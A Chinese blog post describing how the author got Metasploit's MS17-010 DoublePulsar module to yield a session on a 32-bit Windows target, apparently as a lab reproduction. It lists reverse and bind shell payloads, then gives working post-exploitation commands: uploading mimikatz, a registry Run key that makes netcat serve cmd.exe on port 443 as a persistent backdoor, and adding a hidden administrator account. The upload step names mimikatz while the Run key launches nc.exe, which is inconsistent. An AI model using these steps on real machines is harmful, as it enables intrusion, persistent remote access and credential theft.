欢迎光临散文网 会员登陆 & 注册

(Metasploit) MS17-010 漏洞复现典中典之双脉冲星 Doublepulsar 模块攻击失败及其解决

2022-11-20 16:32 作者:Wheat200  | 我要投稿

以下过程全部经由 Kali Linux,省略掉了那些大家都知道的内容。


对于32位的靶机,永恒之蓝不能工作,因此获取并配置双脉冲星模块,使用前,确认 Wine32 状态正常,设置攻击参数,但攻击失败了,信息显示

Remote code execution... 3... 2... 1... 

Exploit completed, but no session was created.


在查阅了能找到的资料后,最终我的成功方案是更换载荷(payload)

下面列出该模块几个最通用的载荷

windows/meterpreter/reverse_tcp

windows/meterpreter/bind_tcp

windows/shell/reverse_tcp

windows/shell/bind_tcp


在我的测试过程中,大多数情况下设置载荷为 windows/meterpreter/bind_tcp 后运行就能得到会话,尽管 reverse_tcp 的安全性高于 bind_tcp,但很无奈,前者就是不干活(很奇怪)。


漏洞利用成功后可能出现的一些其他情况:


如果靶机的 Shell 执行指令后回显乱码,键入

chcp 65001

通常可以大幅改善情况


有些时候靶机会因被攻击而在一分钟内重启,这种情况下可以考虑使用 Netcat 完成持久化工作,Meterpreter 下键入

upload /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe C:\\windows

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'

这样我们等待靶机重启后,键入指令进行连接

nc -v [靶机ip] 443


尝试远程桌面登录但 Administrator 账户密码为空( hashdump 因此报错 )而导致无法登录时,使用靶机 Shell 新建一个账户和密码并将其加入管理员,然后用这个账户登录

net user [username] [passwd] /add

net localgroup administrators [username] /add

(Metasploit) MS17-010 漏洞复现典中典之双脉冲星 Doublepulsar 模块攻击失败及其解决的评论 (共 条)

分享到微博请遵守国家法律